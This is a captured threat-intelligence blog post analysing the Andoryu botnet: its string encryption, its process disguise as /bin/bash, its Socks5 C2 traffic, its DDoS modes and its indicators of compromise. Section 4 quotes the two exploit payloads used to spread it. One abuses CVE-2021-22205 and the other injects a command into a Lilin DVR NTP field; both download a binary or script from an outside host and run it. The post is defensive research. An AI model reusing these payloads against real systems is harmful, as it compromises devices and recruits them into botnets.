ti.qianxin.com Open in urlscan Pro
103.114.158.137  Public Scan

URL: https://ti.qianxin.com/blog/articles/Andoryu-Botnet-A-New-Botnet-Based-on-Socks-Protocol/
Submission: On July 15 via api from SK — Scanned from DE

Form analysis 0 forms found in the DOM

Text Content

返回 TI 主页

RESEARCH

数 据 驱 动 安 全

Andoryu Botnet——A New Botnet Based on Socks Protocol

2023-02-20 By 红雨滴团队 | 事件追踪

PDF IOC


1. OVERVIEW

In early February 2023, the Threat Monitoring System of QiAnXin Threat
Intelligence Center found that some malware family propagated by exploiting
CVE-2021-22205 vulnerability. Through analysis it can be confirmed that the
malware didn’t belong to any known botnet family.

We refer to this new botnet as “Andoryu Botnet” according to the name used by
its creator. This botnet malware communicates with C2 server via Socks5
protocol.

Recent spreading trend of Andoryu Botnet is as follows. From the timeline of
activity, we found that Andoryu Botnet only spreads around the time when it was
updated as well as in a small area, which indicates that the botnet is still in
development.





2. ANALYSIS OF BEHAVIORS

This article uses the x86-64 version of Andoryu Botnet as an example for
analysis, and the sample information is as follows :

- - - File name File Size MD5 Andoryu.x86 42208 bytes
D203E1BB0BA3E8385FF9E1F83C10EB2D

2.1 CHECK OF STARTUP PARAMETERS

First thing that Andoryu does is to check its startup parameters. When there is
a parameter, the malware will run normally.



2.2 STRING ENCRYPTION

Most of the important strings used by the malware are encrypted, and these
encrypted strings are decrypted in bulk by a function at the early stage of
running.







2.3 PROCESS NAME DISGUISE

Use the prctl function to change the process name to “/bin/bash”.



2.4 PRINTING BOTNET INFORMATION

Decrypted strings contains the botnet information which will be printed to the
console when malware running.



Therefore this botnet is named as Andoryu Botnet, and it is shown that the
creator tested the malware on December 30, 2022.



3. SOCKS5 COMMUNICATION

3.1 COMMUNICATION PROCESS

The botnet communicates with C2 server through Socks protocol, and the specific
communication process is as follows:

(1) Firstly, it connect to the hard-coded proxy server with the address
"152.67.66.37:1080".





(2) After three successful handshakes with the proxy server, it starts Socks
authentication. The Socks5 proxy uses no user password authentication.





(3) Then the malware tells the proxy server the address of remote server to be
accessed. The address is also obtained when strings decrypted in bulk. (DST_C2 =
"172.86.123.20:1025")



(4) Next it starts Socks communication and sends a beacon packet which includes
local IP information of the infected host.





(5) The malware receives commands from C2 server via proxy.

QiAnXin Threat Intelligence Center has already monitored the downstream data,
but the attacker has not send any DDoS attack instruction yet. We will continue
to trace Andoryu Botnet and report its latest activity.



3.2 DDOS METHODS

AndoryuBot supports a variety of DDoS methods, as follows:

- - Name Description icmp-echo ICMP Flood udp-ovh UDP Flood for OVH udp-game UDP
Game Flood udp-plain UDP Plain Flood tcp-raw TCP Flood tcp-socket TCP Syn Flood
tcp-handshake TCP Flood



4. UPDATE AND DISSEMINATION

Through correlation analysis of the discovered samples, update of Andoryu Botnet
began in December 2022. After that two updates are seen in the malware. Its
creator didn’t modify the time string which is print in console, while updates
mainly focused on remote server address (DST_C2) and supported architectures.
The CPU architectures supported by the latest version of AndoryuBot are as
follows.

 * Arm
 * Mips
 * M68K
 * SuperH
 * Sparc
 * x86

Andoryu Botnet spreads through Lilin DVR RCE as well as CVE-2021-22205, and the
payload found this time is as follows.

CVE-2021-22205:

P(metadata
.(Copyright "\" . qx{TF=$(mktemp -u);mkfifo $TF && rm -rf Andoryu.10wget;wget http://47.87.154.192/Andoryu.x86 -O Andoryu.10wget;chmod 777 Andoryu.10wget;./Andoryu.10wget gitlab.x86;rm -rf Andoryu.10wget;<$TF | sh 1>$TF} . \" b ") )


Lilin DVR RCE:

User-Agent: Abcd
<?xml version="1.0" encoding="UTF-8"?><DVR Platform="Hi3520"><SetConfiguration File="service.xml"><![CDATA[<?xml version="1.0" encoding="UTF-8"?><DVR Platform="Hi3520"><Service><NTP Enable="True" Interval="20000" Server="time.nist.gov&cd /tmp;wget -O- http://47.87.154.192/lillin|sh;echo DONE"/></Service></DVR>]]></SetConfiguration></DVR>




5. IOCS

MD5:

D203E1BB0BA3E8385FF9E1F83C10EB2D

28F10E60D05018E6D28B79F0976A8542

F9018E4401116435DCFE2DC9D14D0FD5

2BABAF24B23872749EEC1452D7E7C0F3

ABD2496C3B703BD722386A848CC0BC12

6335ECB85ED6C6FCCF71FD841939BEC4

70A568C47785A8C58AA1D755EFE0E39E

FFE05160D769F441EF4A67271F9E614C

BB7DECCC2F6CEB2D5A5C7F5A05A4BBB1

0A1B14C2B8A453323841431FA44D0E32

C9CE8E0A1B13CBB6719133AFE5988CA7

C&C:

152.67.66.37:1080

172.86.123.20: 1025

104.234.239.190:1025

ANDORYU BOTNET SOCKS DDOS
分享到:
首页
Andoryu Botnet——A New Botnet Based on Socks Protocol